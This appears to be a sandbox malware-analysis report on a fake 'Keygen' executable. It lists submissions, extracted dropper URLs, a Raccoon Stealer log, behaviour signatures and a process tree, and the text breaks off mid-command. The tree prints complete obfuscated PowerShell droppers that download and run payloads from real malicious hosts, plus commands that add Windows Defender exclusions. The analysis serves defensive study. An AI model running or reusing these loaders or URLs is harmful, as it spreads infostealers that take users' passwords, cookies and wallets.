Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    88s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (29) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:11:33 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (454 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 2 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 52 IoCs
  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (29) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (29) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1376
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\31F9.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (29) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1696
      • C:\Users\Admin\AppData\Local\Temp\31F9.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1772
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\31F9.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1388
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1952
          • C:\Users\Public\iep.exe
            "C:\Users\Public\iep.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2600
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2680
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2772
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2772 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\316482773635383\\* & exit
                  8⤵
                    PID:1452
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2772
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:672
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2720
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2828
              • C:\Users\Public\iep.exe
                "C:\Users\Public\iep.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2796
                • C:\Users\Admin\AppData\Local\Temp\LDphwj0GPe.exe
                  "C:\Users\Admin\AppData\Local\Temp\LDphwj0GPe.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3008
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\LDphwj0GPe.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:736
                • C:\Users\Admin\AppData\Local\Temp\1Y6WstDKOg.exe
                  "C:\Users\Admin\AppData\Local\Temp\1Y6WstDKOg.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:512
                • C:\Users\Admin\AppData\Local\Temp\dtg6frCXmr.exe
                  "C:\Users\Admin\AppData\Local\Temp\dtg6frCXmr.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:900
                  • \??\c:\windows\SysWOW64\cmstp.exe
                    "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\yejqvjjm.inf
                    8⤵
                      PID:304
                  • C:\Users\Admin\AppData\Local\Temp\q8aqLvXPiQ.exe
                    "C:\Users\Admin\AppData\Local\Temp\q8aqLvXPiQ.exe"
                    7⤵
                    • Executes dropped EXE
                    • Windows security modification
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1496
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "powershell" Get-MpPreference -verbose
                      8⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1968
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\iep.exe"
                    7⤵
                      PID:3020
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        8⤵
                        • Delays execution with timeout.exe
                        PID:1632
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\31F9.tmp\m1.hta"
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:1852
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1904
            • C:\Windows\SysWOW64\timeout.exe
              timeout 1
              3⤵
              • Delays execution with timeout.exe
              PID:1884
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\31F9.tmp\b.hta"
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:608
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = 